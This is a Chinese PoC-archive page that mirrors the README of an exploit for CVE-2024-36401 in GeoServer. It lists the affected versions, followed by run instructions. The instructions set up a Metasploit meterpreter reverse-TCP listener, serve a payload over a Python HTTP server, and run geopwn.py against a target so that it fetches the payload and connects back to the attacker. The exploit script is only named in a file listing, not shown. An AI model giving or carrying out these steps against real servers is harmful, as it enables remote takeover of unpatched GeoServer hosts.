关联漏洞
描述
Proof-of-Concept Exploit for CVE-2024-36401 GeoServer 2.25.1
介绍
# CVE-2024-36401-PoC
Proof-of-Concept Exploit for CVE-2024-36401 GeoServer
Vulnerable Versions of GeoServer are prior to 2.23.6 | 2.24.4 | 2.25.2
To run...
1. Start a listener in Metasploit
- ```
msf6 > use exploit/multi/handler
msf6 > exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp
msf6 > exploit(multi/handler) > set LHOST 10.10.10.1 <--(set to your IP)
msf6 > exploit(multi/handler) > set LPORT 1234 <--(you can leave default, or change to your preference)
msf6 > exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.10.1:1234
```
2. Start HTTP server with Python
- ```
hacker@kali~> python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```
3. Run exploit
- ```
hacker@kali~> python3 ./geopwn.py <target_domain_or_IP> <payload_URL> <LHOST> <LPORT>
```
文件快照
[4.0K] /data/pocs/9f6bfc71dd6af6763275272ac71de41f9abcbcd7
├── [1.6K] geopwn.py
└── [ 900] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。